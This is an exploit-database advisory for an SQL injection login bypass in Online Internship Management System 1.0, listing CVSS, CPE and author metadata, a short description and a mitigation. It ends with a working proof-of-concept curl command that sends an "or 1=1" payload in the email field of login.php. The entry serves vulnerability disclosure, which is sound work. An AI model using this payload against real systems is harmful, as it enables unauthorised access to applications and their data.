Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass

vendor:

Online Internship Management System

by:

Christian Vierschilling

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Internship Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:online_internship_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: PHP 7.4.14, Linux x64_x86

2021

Online Internship Management System 1.0 – ’email’ SQL injection Auth Bypass

The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. A curl request for authentication bypass via sql injection in parameter 'email' can be used to exploit the vulnerability.

Mitigation:

The vulnerability can be patched by sanitizing the user input in the parameters 'email' and 'password' in the file 'login.php'.

Source

Exploit-DB raw data:

# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
# Date: 16-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86


# --- Description --- #

The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. 

# --- Proof of concept --- #

Curl request for authentication bypass via sql injection in parameter 'email':

curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="